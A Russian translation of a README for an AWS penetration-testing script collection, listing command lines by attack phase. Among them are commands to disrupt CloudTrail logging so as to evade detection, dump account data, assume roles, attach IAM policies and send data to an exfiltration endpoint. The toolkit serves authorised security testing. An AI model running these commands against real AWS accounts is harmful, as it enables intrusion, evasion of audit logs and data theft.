
Коллекция всячины для пентеста AWS
Это набор ужасно написанных скриптов для выполнения различных задач, связанных с тестированием на проникновение AWS. Пожалуйста, не расстраивайтесь, если они не работают. Возможно, AWS изменился с момента написания конкретного инструмента, или код просто ужасен. В любом случае, не стесняйтесь вносить свой вклад.
Большая часть этого мусора была написана Дэниелом Гжелаком (Daniel Grzelak), но было много вкладов, наиболее заметный от Майка Фуллера (Mike Fuller).
pip install -r requirements.txt
Убедитесь, что вы также настроили свои учетные данные AWS в ~/.aws/credentials.
Действия по сбору информации до компрометации.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
Действия, которые помогут вам закрепиться в учетной записи.
Действия, которые могут помочь вам остаться незамеченным после компрометации учетной записи.
./disrupt_cloudtrail.py -s
Действия, которые помогут вам понять, что вы взломали.
./dump_account_data.sh /tmp/
Действия, которые помогут вам перемещаться по учетной записи и получать доступ разных уровней.
./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
Действия, которые помогут сохранить ваш доступ к учетной записи.
Действия, которые помогут извлекать и перемещать данные в стиле AWS.
Прочие вещи, которые я был слишком глуп или ленив, чтобы классифицировать.